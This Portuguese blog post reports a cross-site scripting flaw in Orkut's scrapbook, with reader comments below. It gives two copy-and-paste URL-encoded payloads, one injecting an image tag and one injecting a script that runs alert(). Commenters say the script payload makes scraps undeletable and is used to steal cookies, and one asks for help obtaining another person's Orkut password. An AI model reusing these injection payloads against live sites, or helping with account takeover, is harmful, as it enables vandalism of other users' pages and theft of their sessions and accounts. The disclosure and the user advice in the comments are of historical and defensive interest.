Falha de segurança grave é encontrada no Orkut

Os usuários Victor Pencak e Steven Conte reportaram uma falha de segurança grave no sistema de recados do Orkut. Graças ao bug, as pessoas podem inserir scripts, imagens e vídeos nos recados. Embora o conteudo pareça inofensivo, os scripts e imagens podem explorar falhas no navegador e no sistema, causando danos que variam de simples instabilidades à Vírus e Malwares em geral. Por isso recomendamos muito cuidado com o uso do serviço enquanto o bug não é corrigido.

Para enviar uma imagem a um amigo, basta copiar a url abaixo, substituindo endereco_da_imagem pelo local onde a foto se encontra armazenada.

http://www.orkut.com/%22%3e%3c/a%3e%3Cimg%20src%3D%22
endereco_da_imagem

%22%3E%3Ca%20style%3D%22display%3Anone%22%20href%3D%22%3C/a%3E

*Url dividida em linhas para facilitar a vizualização

O mesmo código pode ser usado para implantar pequenos scripts. O exemplo à seguir dispara uma caixa de mensagens com o uso da função alert(); Novamente, basta copiar e colar.


http://www.orkut.com/%22%3e%3c/a%3e%3cscript%3ealert%28%22
Oi!!%22%29%3c/script%3e%3ca%20style=%22display%3anone%22%20href=%22/

*Url dividida em linhas para facilitar a vizualização

O Google ainda não se pronunciou sobre o assunto.

Popularity: 4% [?]

45 ideias sobre “Falha de segurança grave é encontrada no Orkut

  1. Opera [www.opera.com] também é bem seguro.

    Ah, e o segundo código, é mais conhecido como “Fodedor de Scrapbook”, ele não pode ser deletado e pode bugar todo o scrapbook, (sumir com scraps antigos, bloquear postagem de novos scraps).

  2. Realmente faz sentido o que o Sonic disse.
    Tanto o sistema que posta nos scrapbooks quanto o sistema que apaga scraps é escrito em javascript, podendo assim “qualquer pessoa” escrever um código para, por exemplo, apagar todos os scraps.
    Este novo template do Orkut.com está muito bugado! JavaScripts ferrados por todos os lados… E eu não tenho visto eles corrigirem tais. Só espero que não tenham abandonado o projeto 😛
  3. concerteza é de má fé do orkut, pois tais bugs sao facilmente descobertos, tornando assim a proliferação do mozilla bem rapida !

    eu axo issu

  4. O negócio é parar de usar orkut e começar a usar algo mais útil e com mais funções, como o Multiply e o MySpace. Uma pena que orkut “infectou” o Brasil e ninguém pensa em mudar de posição quanto a isso. Talvez porque o orkut seja o site mais próximo do nosso país: bagunça, fofoca, insegurança, falta de privacidade, vandalismo, inutilidades, burocracia, etc etc etc…
  5. firehawkz…
    falou tudo.
    quero sair do orkut, mas pessoas insistem a fazer daquilo um messenger. :S
    curto o myspace, apesar de não usar muito por não conhecer ninguém que tenha um, mas sei lá, cansei da cara do orkut. :S
    é isso aew, flw!
  6. tah realmente foda o orkut… o virus da foto jah virou piada entre os usuarios… volte e meia recebo um scrap “olhe as fotos da festa…” daí lah vou eu mandar o link do antivirus do linha defensiva da UOL…

    e esses codigos… aff… ningem merece…

    concordo com mta gente q chama d orkú…

  7. falaram uns absurdos monstros hein, o orkut bugo o site para ajuda a mozzila foi demais…
    os caras estaum refazendo um site q é visitado por milhoes de pessoas, assim é facil achar erros, tem milhoes de nego sem oq fazer para achar…
    o site ta mais rapido, mais leve, e ficando mais funcional…
    agora so teve a onda de virus de imagens porque pessoas burras e curiosas nao ve oq clicam…, um errinho voces ja estao falando em deletar scraps em massas, nada é assim gente… calma!
  8. @ FiReHaWkZ

    concordo com vc qdo diz q o orkut é igualsinho ao brasil, o fueda é q eu nao consigo gostar do myspace, e esse Multiply eu nao conheço, passa o site alguem pra mim por favor, pq orkut, ta um orkú msm !

    flw abraçus

  9. fui testar esse script da caixa de mensagem no meu scrap e fiquei com um scrap vazio “indeletavel” 😛

    alguem sabe como reparar esse erro? ou soh esperando o pessoal do orkut ajeitar?

  10. lol zuei scrapbook de uma amiga sem querer.
    Não tem como deletar também…

    que foda! UAHAUAHAAUAH

    esse é um bom método para quem queria deletar todos os scraps UAHAUAHAUAHAU

  11. @ estivem

    O endereço do Multiply é http://www.multiply.com
    Se quiser dá uma passada no meu perfil lá http://firehawkz.multiply.com
    Recomendo a todos, pois a página do perfil é totalmente customizável, pode-se hospedar vídeos (importa do YouTube e Google Video), fotos (importa do flickr e ImageShack), músicas (importa não sei da onde mas importa…rs), receitas, favoritos, calendário, blog, notas e muito mais.
    E lá já tem uma comunidade razoavelmente grande de brasileiros.

    É isso aí, abraços.

  12. Ae para quem postou recado no scrapbook e sumiu tudo, inclusive o link para deletar o scrap.

    Para resolver isto apenas deixe mais 9 recados consecutivos. Isto fará com que apareça novamente o link de “próxima página”.

    Simples :]

  13. descobri como corrigir, coloca na barra de endereços:

    javascript:void(document.body.innerHTML=document.body.innerHTML.replace(/script/gim,’i’));

    o scrap indeletavel vira deletavel….

  14. Ruim para o Google, pois devido comentários “acidos” comparando o Google com a Microsoft, isso pode diminuir a confiabilidade da marca Google no mercado.
  15. “Por isso recomendamos o uso do Mozilla Firefox, o navegador mais seguro disponível no mercado.”

    Ôpa! Aí é que está o problema, os caras deram um jeito de capturar os cookies alheios explorando esse bug. E adivinha em que navegador essa falha ocorre? Ganhou um doce quem respondeu Firefox. Isso mesmo, essa vulnerabilidade não existe no Internet Explorer.

    Se quiserem mais informações, entrem em contato comigo.

  16. Cliquei num desses links que pega informações da conta ao visitar o perfil de uma colega e clicar no link para deixar um scrap. Adianta somente mudar a senha da conta Google (mudei imediatamente) ou uma medida mais drástica se faz necessária?

    Na boa? Já passou da hora da Google dar um jeito no Orkut. Sei que a maior parte da culpa é de usuários mal intensionados e de usuários tolos que informam login e senha em sites para mandar scraps bonitinhos para todos os contatos, quando o próprio Orkut tem o envio de mensagens a todos da lista; ainda assim a Google deveria tomar uma atitude mais séria.

    No momento é só o Orkut que está com má fama (reduto da pilantragem e coisas bem piores); num futuro próximo poderá ser a Google a ficar com má fama.

    Gosto do Orkut. Se bem utilizada e bem administrada é uma ferramenta maravilhosa para todo tipo de pesquisa. Foi graças ao Orkut que decidi comprar determinada câmera digital, após ler relatos numa comunidade para quem tinha aquele modelo; foi no Orkut que fiquei sabendo de um defeito de fabricação da antiga máquina e que a Canon conserta o problema gratuitamente e foi o Orkut que me reaproximou de pessoas com quem estudei no Jardim de Infância!

    Acredito que o Orkut ainda tenha salvação.

  17. Mas desabilitando o JavaScript no Firefox (Preferences > Content) é possível se safar do bug… o ruim é que não se pode enviar nenhum texto (scrap ou post), ou seja, o Orkut fica em ‘read-only’.
  18. Ricardo, a solução não seria então manter o javascript desabilitado e habilitá-lo somente quando for postar algo? É trabalhoso, mas ao menos garante um mínimo de segurança…

    ps.: O post do blog deveria ter um alerta para o fato desse segundo código ser o “fodedor de scrapbook”

  19. @infoline:

    Não se tratam de “absurdos monstros” como você disse. Antes de mais nada, eu gostaria de exclarecer que essa falha de segurança não requer intervenção do usuário. Por isso, não importa seu nível de conhecimento ou sua capacidade de identificar um botão malicioso, pois tudo acontece automaticamente.

    Quanto ao Firefox, ele de fato ajuda. Linguagens de script são limitadas pelo aplicativo que as executa. Isso significa que você esta mais seguro em um navegador que tenha menos falhas e que impeça o acesso ao sistema através do script.

    @Marcus Danillo:

    “Essa vulnerabilidade” realmente não existe no internet explorer. Mas o que dizer à respeito das dezenas de outras? Outro aspecto a ser considerado é o fato de o firefox ter seu código aberto.

  20. eu gostei.. haiusdhuasdaiushdausihdaisd
    nao gostei de vc.. fodo seu scrapbook, gostei,, te mando uma imagem legal.. hasiudhuaihsduiasd
    =]]]
    (6)
  21. @SpyGamer,

    em primeirao mao nao tinha testado o script ainda, pelo que lia na noticia nao parecia algo taum grande, e decorrente aos comentarios fico conclusivo isso, ainda nao acredito q posso haver o roubo de senhas por exemplo, ou mesmo instalacao de um verme ou algo do tipo na propria maquina….

  22. @Infoline:

    O “poder de fogo” do JavaScript e do HTML é limitado pelo navegador utilizado. Uma possível falha nesse navegador poderia trazer conseqüências graves caso o código a ser interpretado fosse malicioso.

    Veja como exemplo a Wikipédia e os fóruns em php. Eles não têm uma linguagem própria para os posts atoa. Isso é feito por medida de segurança, para evitar que usuários mal intencionados insiram código malicioso de qualquer natureza no site.

    Embora tenha testado alguns scripts enquanto a falha esteve ativa, eu não tentei obter o document.cookie(); para saber se esse funcionaria, mas acredito que sim.

  23. Será q alguém aki sabe como mandar códigos Javascript nos recados do orkut é pq ele bloqueia!
    Plizzzzzzzzzz
  24. Pingback: AllCool :: Como apagar o scrap com script do orkut ! :: December :: 2007

  25. Queria ter acesso aos scraps bloqueados, mas sei q hj isso é impossível, pensei então em descobrir o loginn e a senha do orkut. Alguém pode me ajudar? por favor? bjs

Os comentários estão fechados.